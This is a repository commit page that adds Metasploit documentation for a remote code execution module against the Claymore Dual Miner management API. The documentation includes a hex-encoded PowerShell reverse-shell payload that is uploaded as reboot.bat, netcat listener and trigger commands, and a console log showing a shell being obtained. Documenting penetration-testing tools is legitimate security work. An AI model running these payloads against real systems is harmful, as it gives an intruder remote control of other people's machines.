infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Initial Claymore Dual Miner RCE doc commit

GSoC/Meterpreter_Web_Console
ReverseBrain 2018-07-02 16:02:36 +02:00
parent 54c2bc36e9
commit 43d71cdc09
1 changed files with 48 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

48
documentation/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rce.md Normal file
View File

@ -0,0 +1,48 @@
## Description
This module connects to the Claymore Dual Miner API server to exploit the RCE.
This module can target the remote system if the miner is running with read/write mode enabled.
## Vulnerable Application
[Claymore Dual Miner](https://github.com/nanopool/Claymore-Dual-Miner) allows an user to control the miner
configuration by uploading files inside its directory using the server API. Since there is no check on file names, an attacker
can exploit this vulnerability by uploading a reboot.bat or reboot.sh file and execute it via Remote Manager GUI.
## Verification Steps
1. Start the vulnerable software: `EthDcrMiner64.exe -epool eth-eu1.nanopool.org:9999 -ewal 0x83718eb67761Cf59E116B92A8F5B6CFE28A186E2 -epsw x -mode 1 -ftime 10 -mport 3333`
2. Run on terminal: `{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat", "706f7765727368656c6c2e657865202d436f6d6d616e64202224636c69656e74203d204e65772d4f626a6563742053797374656d2e4e65742e536f636b6574732e544350436c69656e7428273132372e302e302e31272c31323334293b2473747265616d203d2024636c69656e742e47657453747265616d28293b5b627974655b5d5d246279746573203d20302e2e36353533357c257b307d3b7768696c6528282469203d202473747265616d2e52656164282462797465732c20302c202462797465732e4c656e6774682929202d6e652030297b3b2464617461203d20284e65772d4f626a656374202d547970654e616d652053797374656d2e546578742e4153434949456e636f64696e67292e476574537472696e67282462797465732c302c202469293b2473656e646261636b203d202869657820246461746120323e2631207c204f75742d537472696e6720293b2473656e646261636b3220203d202473656e646261636b202b202750532027202b2028707764292e50617468202b20273e20273b2473656e6462797465203d20285b746578742e656e636f64696e675d3a3a4153434949292e4765744279746573282473656e646261636b32293b2473747265616d2e5772697465282473656e64627974652c302c2473656e64627974652e4c656e677468293b2473747265616d2e466c75736828297d3b24636c69656e742e436c6f7365282922"]}`
3. Run on terminal: `nc -lvp 1234`
4. Run on terminal: `echo -e '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}\n' | nc 127.0.0.1 3333 && echo`
5. You should get a shell
## Options
**RHOST**
Remote Host
**RPORT**
Remote port the vulnerable software is running at, default is 3333.
### Remote target
```
msf5 > use exploit/multi/misc/claymore_dual_miner_remote_manager_rce
msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rcee) > set lport 1234
lport => 1234
msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > exploit
[*] Started reverse TCP handler on 127.0.0.1:1234
[*] Command shell session 1 opened (127.0.0.1:1234 -> 127.0.0.1:3333) at 2018-07-02 18:43:41 +0000
whoami
reversebrain
```